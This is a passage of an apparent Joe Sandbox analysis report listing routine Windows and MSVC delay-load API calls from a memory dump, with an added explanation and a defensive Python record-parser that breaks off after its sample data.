                                                                                      • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction Fuzzy Hash: BFF07FB2C012999ECB41EFA8C8456EEBBF1AB18304F1442BFD409E7252E73956458B95
                                                                                      APIs
                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 0040F927
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecutionStateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2211380416-0
                                                                                      • Opcode ID: ae1f3963e6b1fb02d305bb5c20d36188ed614cd8fa2ae4ae82c96e9da6e8852f
                                                                                      • Instruction ID: f14aebff4213777597030cc17468544ce580a3d290c2bab53f4215503aec6059
                                                                                      • Opcode Fuzzy Hash: ae1f3963e6b1fb02d305bb5c20d36188ed614cd8fa2ae4ae82c96e9da6e8852f
                                                                                      • Instruction Fuzzy Hash: BAD05BA171411122D62533297946BFE16074FC6329F09007FF105777E38AAD08EA93FD
                                                                                      APIs
                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00418B6B
                                                                                        • Part of subcall function 00418924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00418945
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                      • String ID:
                                                                                      • API String ID: 1915507550-0
                                                                                      • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction ID: 22dbae5cb2bccb8ae91eae4281d64495397cca47ac01393667193f501e6bcfb8
                                                                                      • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction Fuzzy Hash: 17D0A77068420C7BDF406E619C039FE7BD9DB02350F00413FBC0495250EE76DD916256
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(000000FF,0040964C), ref: 00409726
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: 0bf330125303400f6aa970cbe79ad5123578d3629e26b68cee1d2b661a685368
                                                                                      • Instruction ID: 7756fcc8eb2cbe293b70b8e07ba3f2af52ff5630e9bc92dca2b9110403948da2
                                                                                      • Opcode Fuzzy Hash: 0bf330125303400f6aa970cbe79ad5123578d3629e26b68cee1d2b661a685368
                                                                                      • Instruction Fuzzy Hash: A1D01232031200D6CE650E385D5906B67619B433A6B28DBF5E165D61E2C73ACC43F544
                                                                                      APIs
                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0041BF9C
                                                                                        • Part of subcall function 0041991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041992F
                                                                                        • Part of subcall function 0041991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419940
                                                                                        • Part of subcall function 0041991E: TranslateMessage.USER32(?), ref: 0041994A
                                                                                        • Part of subcall function 0041991E: DispatchMessageW.USER32(?), ref: 00419954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemPeekSendTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4142818094-0
                                                                                      • Opcode ID: 058fe8c3ed59c6e804a8e6da93f56236a4d00919e972209302c2a246216dec53
                                                                                      • Instruction ID: 6694a9e13021fa16f72761a3ac7553495a04df7914dd59ae4170b1c122a82a64
                                                                                      • Opcode Fuzzy Hash: 058fe8c3ed59c6e804a8e6da93f56236a4d00919e972209302c2a246216dec53
                                                                                      • Instruction Fuzzy Hash: 50D09E71154200EAD6112B52CE06F0ABAE2BB88B08F404969B344340F186A2AD70AB0A
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 88df826a45575121b540eb717351e1fee102ec83756e016d2bf5ce04d1084e7a
                                                                                      • Instruction ID: 63e005d469a065c47907b09b2ade9d2a5d9053baa51f9462ebc6f40ac8ce5a70
                                                                                      • Opcode Fuzzy Hash: 88df826a45575121b540eb717351e1fee102ec83756e016d2bf5ce04d1084e7a
                                                                                      • Instruction Fuzzy Hash: CCB012B22F81026C3145E1455E42F77410CC4C8B14730A16FF411C01C0E98C4C85513F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 40736aeca112c40ab21c59bd4f9606c31593084328c7714ddb3d7506300ef73c
                                                                                      • Instruction ID: e749206741baff539bdd797a1ff1825779db1143be32ea385d64bf0d216f3d9d
                                                                                      • Opcode Fuzzy Hash: 40736aeca112c40ab21c59bd4f9606c31593084328c7714ddb3d7506300ef73c
                                                                                      • Instruction Fuzzy Hash: B9B012B22F82026C3145E1051E86F77410CC4C8B14730E06FF810C01D0E98C0D85453F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: b4cbd39b6faf8869fab96b6a0f701f5987d476b5a1dbc26995264d832de23cd5
                                                                                      • Instruction ID: 8244c7749e0280cc3110225dc13449be0c2e44eed30eb9a05292fcc7612dcce0
                                                                                      • Opcode Fuzzy Hash: b4cbd39b6faf8869fab96b6a0f701f5987d476b5a1dbc26995264d832de23cd5
                                                                                      • Instruction Fuzzy Hash: 3DB012B22E83026D3145E1052F82F77410CC4C8B14730A06FF410C01D0E98C0D86453F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c4c3c450b166bf85861d48c244dc7f4c57e632522d1baaa3483efa039292fb97
                                                                                      • Instruction ID: 8b4ae4442e35ba2134765d50433ada996e5ded6699bb98c069e8a83cfac8ba25
                                                                                      • Opcode Fuzzy Hash: c4c3c450b166bf85861d48c244dc7f4c57e632522d1baaa3483efa039292fb97
                                                                                      • Instruction Fuzzy Hash: 75B012B22E83027C3505A1411EC2F77410CC4C8B24730A16FF410D40D0E98C1DC5853F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d7c9e9d272cf00cf9fcb546564cf1119eba8d07c7cd01be01ab9384109328d36
                                                                                      • Instruction ID: 920766836ea6c1434ddafe65991cbb681c17adda6885b5eeb8bc3faf71867e3e
                                                                                      • Opcode Fuzzy Hash: d7c9e9d272cf00cf9fcb546564cf1119eba8d07c7cd01be01ab9384109328d36
                                                                                      • Instruction Fuzzy Hash: 84B012B12DC1026D3144D1462D42F77410DC4C8B24730D01FF440C1181E9CC1CDA443F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 530a5838246b0557050972c301e2bc85cb4586bdcfe2c4e7e7400153f7a96f11
                                                                                      • Instruction ID: a6b06c6505790d937d0571dd5694f397833c4e0bd40b6fab0ed09ae5ff525c18
                                                                                      • Opcode Fuzzy Hash: 530a5838246b0557050972c301e2bc85cb4586bdcfe2c4e7e7400153f7a96f11
                                                                                      • Instruction Fuzzy Hash: 85B012B12DC2027D314491412CC6F77410DC4C5B24730D01FF840C0081EACC1CD9443F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d5d0a5d68466c49d864b903f64e485f010a391570fea85aaaedfa1878a5d2e82
                                                                                      • Instruction ID: 35c4f66703c71098ebc62499767e97e63e325b3a18744d2d0118298ea7a1c2d3
                                                                                      • Opcode Fuzzy Hash: d5d0a5d68466c49d864b903f64e485f010a391570fea85aaaedfa1878a5d2e82
                                                                                      • Instruction Fuzzy Hash: 69B012B12DC2066D3144D1462C82F77410CC4C8B24730D01FF440C0191EACC1CD1413F
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 7c583c8fba02a9de65161721f84e46991b5192ef5397e37dc08c547e08e325bc
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: 7c583c8fba02a9de65161721f84e46991b5192ef5397e37dc08c547e08e325bc
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: bed06b7e7dd5afd85056a88ce4e245572150161fdc79ad6a64be2159b6202107
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: bed06b7e7dd5afd85056a88ce4e245572150161fdc79ad6a64be2159b6202107
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: ed1ebf805150ceacb15d4e9cbcd338ed56157cca722b44776424257aef23b39d
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: ed1ebf805150ceacb15d4e9cbcd338ed56157cca722b44776424257aef23b39d
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 9ac74f6a6f73242f465cb1076f5c1369f6dda51d3b55601fbdeff8dc01d2e3e4
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: 9ac74f6a6f73242f465cb1076f5c1369f6dda51d3b55601fbdeff8dc01d2e3e4
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
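Every record in this run of the similarity dump resolves to the same three calls: the MSVC delay-load helper (___delayLoadHelper2@8), its DloadReleaseSectionWriteAccess subcall, and a RaiseException with status C06D0057. That status is what the delayimp.h VcppException macro produces for ERROR_SEVERITY_ERROR with Win32 error 0x57 (ERROR_INVALID_PARAMETER, facility 0x6D), i.e. the CRT's own error path inside delayhlp.cpp, not logic written by the sample's author. Several of the records also share one Instruction ID and Instruction Fuzzy Hash (75302f0d... / 4FA012B1...) while differing only in Opcode ID, which is the same stub emitted at more than one address. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the layout used on this page, decodes the exception status, flags records that are nothing but this delay-load stub, and collapses them by Instruction ID. The three records embedded in it are copied from this page (with fields the logic does not read omitted); the subset-of-three-APIs rule used for classification is the example's own heuristic.

```python
import re
from collections import defaultdict

FACILITY_VISUALCPP = 0x6D        # facility that VcppException() packs into the status (delayimp.h)
ERROR_INVALID_PARAMETER = 87     # Win32 error 0x57, the low word of C06D0057
DELAY_LOAD_APIS = {"___delayLoadHelper2@8", "DloadReleaseSectionWriteAccess", "RaiseException"}

# Constructed input: three records copied from this page in the layout the report uses
# (fields the logic below does not read are omitted from the second and third record).
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
  • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
  • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
• Opcode ID: 7c583c8fba02a9de65161721f84e46991b5192ef5397e37dc08c547e08e325bc
• Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
• Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
  • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
  • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
Similarity
• Opcode ID: bed06b7e7dd5afd85056a88ce4e245572150161fdc79ad6a64be2159b6202107
• Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
• Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
  • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
  • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
Similarity
• Opcode ID: d7c9e9d272cf00cf9fcb546564cf1119eba8d07c7cd01be01ab9384109328d36
• Instruction ID: 920766836ea6c1434ddafe65991cbb681c17adda6885b5eeb8bc3faf71867e3e
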